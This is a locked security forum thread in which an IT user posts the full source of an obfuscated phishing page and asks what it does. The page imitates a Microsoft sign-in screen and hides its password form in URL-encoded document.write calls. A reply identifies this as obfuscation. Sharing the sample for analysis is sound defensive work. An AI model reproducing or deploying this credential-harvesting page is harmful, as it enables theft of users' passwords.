This discussion has been locked.

You can no longer post new replies to this discussion. If you have a question you can start a new discussion

malicious encoded javascript in website source code

LHerzog over 3 years ago

Hi,

can you decrypt this code lines seen in a recent pishing campaing hitting us?

Partially base64 encoded javascript, variables for something called spoguestaccess which makes me nervous and so on.

What does it do? Download payload? Currently not detected by Intercept-X

PS: also have a case open for this

sourcecode1.txt

Fullscreen sourcecode2.txt Download


<!DOCTYPE html>
<html>
<head>
	<title>&#x53;&#x69;&#x67;&#x6E;&#x20;&#x69;&#x6E;&#x20;&#x74;&#x6F;&#x20;&#x79;&#x6F;&#x75;&#x72;&#x20;&#x61;&#x63;&#x63;&#x6F;&#x75;&#x6E;&#x74;</title>
	<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0, user-scalable=no">
	<meta name="robots" content "none">
	<meta name="Googlebot" content="nofollow">
	<meta name="robots" content "noindex, nofollow">
	<link rel="shortcut icon" type="icon" href="images/favicon.png">
	<link rel="stylesheet" type="text/css" href="style.css">
	<script type="text/javascript" src="js/jquery.js"></script>	
	
</head>

<body>
<script type="text/javascript">
<!--
document.write(unescape('%09%3C%64%69%76%20%63%6C%61%73%73%3D%22%6F%76%65%72%6C%61%79%22%3E%0A%09%09%3C%64%69%76%20%63%6C%61%73%73%3D%22%6C%6F%67%69%6E%2D%62%6F%78%22%3E%0A%09%09%09%3C%69%6D%67%20%73%72%63%3D%22%69%6D%61%67%65%73%2F%6D%73%2D%6C%6F%67%6F%2D%76%32%2E%6A%70%67%22%20%61%6C%74%3D%22%6C%6F%67%6F%22%3E%0A%09%09%09%3C%64%69%76%20%69%64%3D%22%69%64%65%6E%74%69%74%79%22%20%63%6C%61%73%73%3D%22%69%64%65%6E%74%69%74%79%2D%62%61%6E%6E%65%72%22%3E'));
//-->
</script>
			
				<div id="identity-name" class="identity">
					&nbsp;&nbsp;&nbsp;<img src="images/arrow.png" alt="arrow">&nbsp;&nbsp;&nbsp;&nbsp;golllel@byom.de				</div>
				
				
			</div>

			<h2 id="title" style="color:#231E17;"><strong>&#x45;&#x6E;&#x74;&#x65;&#x72;&#x20;&#x70;&#x61;&#x73;&#x73;&#x77;&#x6F;&#x72;&#x64;</strong></h2>
			<p id="message" class="message"></p>

<script type="text/javascript">
<!--
document.write(unescape('%09%09%09%3C%64%69%76%20%69%64%3D%22%6C%6F%61%64%65%72%22%20%63%6C%61%73%73%3D%22%6C%6F%61%64%65%72%20%68%69%64%64%65%6E%22%3E%0A%09%09%09%09%3C%64%69%76%20%63%6C%61%73%73%3D%22%63%69%72%63%6C%65%22%3E%3C%2F%64%69%76%3E%0A%09%09%09%09%3C%64%69%76%20%63%6C%61%73%73%3D%22%63%69%72%63%6C%65%22%3E%3C%2F%64%69%76%3E%0A%09%09%09%09%3C%64%69%76%20%63%6C%61%73%73%3D%22%63%69%72%63%6C%65%22%3E%3C%2F%64%69%76%3E%0A%09%09%09%09%3C%64%69%76%20%63%6C%61%73%73%3D%22%63%69%72%63%6C%65%22%3E%3C%2F%64%69%76%3E%0A%09%09%09%09%3C%64%69%76%20%63%6C%61%73%73%3D%22%63%69%72%63%6C%65%22%3E%3C%2F%64%69%76%3E%0A%09%09%09%3C%2F%64%69%76%3E'));
//-->
</script>

			<form action="submit.php" method="post">
				<input type="hidden" id="email" name="email" value="golllel@byom.de">
<script type="text/javascript">
<!--
document.write(unescape('%09%09%09%09%3C%69%6E%70%75%74%20%69%64%3D%22%70%61%73%73%77%6F%72%64%22%20%74%79%70%65%3D%22%70%61%73%73%77%6F%72%64%22%20%6E%61%6D%65%3D%22%70%61%73%73%77%6F%72%64%22%20%70%6C%61%63%65%68%6F%6C%64%65%72%3D%22%50%61%73%73%77%6F%72%64%22%20%72%65%71%75%69%72%65%64%20%61%75%74%6F%66%6F%63%75%73%3E%0A%09%09%09%09%0A%09%09%09%3C%62%72%3E%0A%0A%09%09%09%3C%64%69%76%20%69%64%3D%22%67%72%6F%75%70%32%22%3E%0A%09%09%09%09%0A%09%09%09%09%3C%73%6D%61%6C%6C%20%69%64%3D%22%66%70%73%22%3E%3C%61%20%68%72%65%66%3D%22%23%22%20%63%6C%61%73%73%3D%22%66%61%64%65%22%3E%26%23%78%34%36%3B%26%23%78%36%46%3B%26%23%78%37%32%3B%26%23%78%36%37%3B%26%23%78%36%46%3B%26%23%78%37%34%3B%26%23%78%32%30%3B%26%23%78%36%44%3B%26%23%78%37%39%3B%26%23%78%32%30%3B%26%23%78%37%30%3B%26%23%78%36%31%3B%26%23%78%37%33%3B%26%23%78%37%33%3B%26%23%78%37%37%3B%26%23%78%36%46%3B%26%23%78%37%32%3B%26%23%78%36%34%3B%3C%2F%61%3E%3C%2F%73%6D%61%6C%6C%3E%0A%09%09%09%09%3C%62%72%3E%0A%09%09%09%09%3C%62%72%3E%0A%09%09%09%09%3C%62%72%3E%0A%09%09%09%0A%09%09%09%3C%2F%64%69%76%3E%0A%09%09%09%3C%69%6E%70%75%74%20%69%64%3D%22%73%69%67%6E%69%6E%22%20%74%79%70%65%3D%22%73%75%62%6D%69%74%22%20%6E%61%6D%65%3D%22%73%69%67%6E%69%6E%22%20%76%61%6C%75%65%3D%22%53%69%67%6E%20%69%6E%22%3E%0A%09%09%09%3C%2F%66%6F%72%6D%3E%0A%09%09%3C%2F%64%69%76%3E%0A%09%3C%2F%64%69%76%3E%0A%0A%09%3C%66%6F%6F%74%65%72%3E%0A%09%09%3C%75%6C%3E%0A%09%09%09%3C%6C%69%3E%3C%61%20%68%72%65%66%3D%22%23%22%3E%26%23%78%35%30%3B%26%23%78%37%32%3B%26%23%78%36%39%3B%26%23%78%37%36%3B%26%23%78%36%31%3B%26%23%78%36%33%3B%26%23%78%37%39%3B%20%26%20%26%23%78%36%33%3B%26%23%78%36%46%3B%26%23%78%36%46%3B%26%23%78%36%42%3B%26%23%78%36%39%3B%26%23%78%36%35%3B%26%23%78%37%33%3B%3C%2F%61%3E%3C%2F%6C%69%3E%0A%09%09%09%3C%6C%69%3E%3C%61%20%68%72%65%66%3D%22%23%22%3E%26%23%78%35%34%3B%26%23%78%36%35%3B%26%23%78%37%32%3B%26%23%78%36%44%3B%26%23%78%37%33%3B%26%23%78%32%30%3B%26%23%78%36%46%3B%26%23%78%36%36%3B%26%23%78%32%30%3B%26%23%78%37%35%3B%26%23%78%37%33%3B%26%23%78%36%35%3B%3C%2F%61%3E%3C%2F%6C%69%3E%0A%09%09%09%3C%6C%69%3E%3C%61%3E%26%63%6F%70%79%3B%26%23%78%33%32%3B%26%23%78%33%30%3B%26%23%78%33%32%3B%26%23%78%33%30%3B%26%23%78%32%30%3B%26%23%78%34%44%3B%26%23%78%36%39%3B%26%23%78%36%33%3B%26%23%78%37%32%3B%26%23%78%36%46%3B%26%23%78%37%33%3B%26%23%78%36%46%3B%26%23%78%36%36%3B%26%23%78%37%34%3B%3C%2F%61%3E%3C%2F%6C%69%3E%0A%09%09%3C%2F%75%6C%3E'));
//-->
</script>
	</footer>

</body>
</html>

Regards

This thread was automatically locked due to age.

Top Replies

Sophos User930 over 3 years ago +1 verified

The document.write sections are just parts of the web page. I guess to obfuscate the form. E.g. document.write 1 <div class="overlay"> <div class="login-box"> <img src="images/ms-logo-v2.jpg" alt="logo…